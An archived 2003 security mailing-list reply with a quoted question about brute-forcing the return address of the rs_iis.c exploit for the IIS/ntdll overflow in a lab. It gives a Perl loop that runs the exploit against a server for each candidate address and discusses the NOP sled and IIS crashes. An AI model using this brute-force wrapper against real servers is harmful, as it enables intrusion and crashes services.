-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
I'm no perl expert, but this is what I whipped up for a similar test:
$myserver = "pvdnet05";
for ($i = 0; $i < 256; $i++) {
$retcode = sprintf("%x", $i);
$exec = "./rs_iis $myserver 80 31337 " . $retcode . "04";
system($exec);
sleep(1);
}
Note that the last byte of the RET address is not terribly
significant, since the NOP sled is ~65K in size and this value is
only max 256 bytes significant.
This didn't work well for me, since IIS will sometimes crash without
a valid RET address, requiring a server restart. I had meant to look
for a way to restart Windows 2000 services from a Linux box with
Samba or similar tool, but got bored with it and started trying to
exploit something else. :)
- -Joshua Wright
Senior Network and Security Architect
Johnson & Wales University
Joshua.Wrightat_private
http://home.jwu.edu/jwright/
pgpkey: http://home.jwu.edu/jwright/pgpkey.htm
fingerprint: FDA5 12FC F391 3740 E0AE BDB6 8FE2 FC0A D44B 4A73
> In playing with rs_iis.c (ntdll exploit) in our lab, I've been
> looking for ways to brute force the return address.
>
> I know there's been a shell script (rs_brute.sh) released that
> already does this, but since I've been playing with PERL lately
> (and
> since this
> shell script did not exist when I began playing with the exploit),
> I thought I'd take a whack at producing the RET addresses
> (0x0000-0xffff)
> in a PERL script. I just wanted to get your input and see if there
> is and easier way to do this (using PERL, of course).
> Basically, the goal
> is as follows:
>
> 1) generate Hex Numbers from 0x0000 to 0xffff in the following
> pattern (0x0000 0x0101 0x0202...0xfdfd 0xfefe 0xffff)
> 2) pass the output to rs_iis via system() command?
>
> So far, I can generate the output and print it to stdout. Any tips
> on getting the script to run rs_iis once with each address
> produced by the
> script? Also, is there a way to produce this output without
> creating an
> array like this?
>
> #!/usr/bin/perl -w
> @HexD =
> ('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');
>
> for ($i = 0; $i <= 255; $i += 1) {
> printf("$HexD[int($i / 16)]$HexD[$i % 16]", $i);
> printf("$HexD[int($i / 16)]$HexD[$i % 16]\n", $i);
> }
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>
iQA/AwUBPor/AY/i/ArUS0pzEQJ75wCeNFPqMa0+AwwuCcYgb7YwRdt98KsAn2HZ
Il0dIPyWAX6swPIQfg/LvvQk
=hz0W
-----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Thu Apr 03 2003 - 10:06:33 PST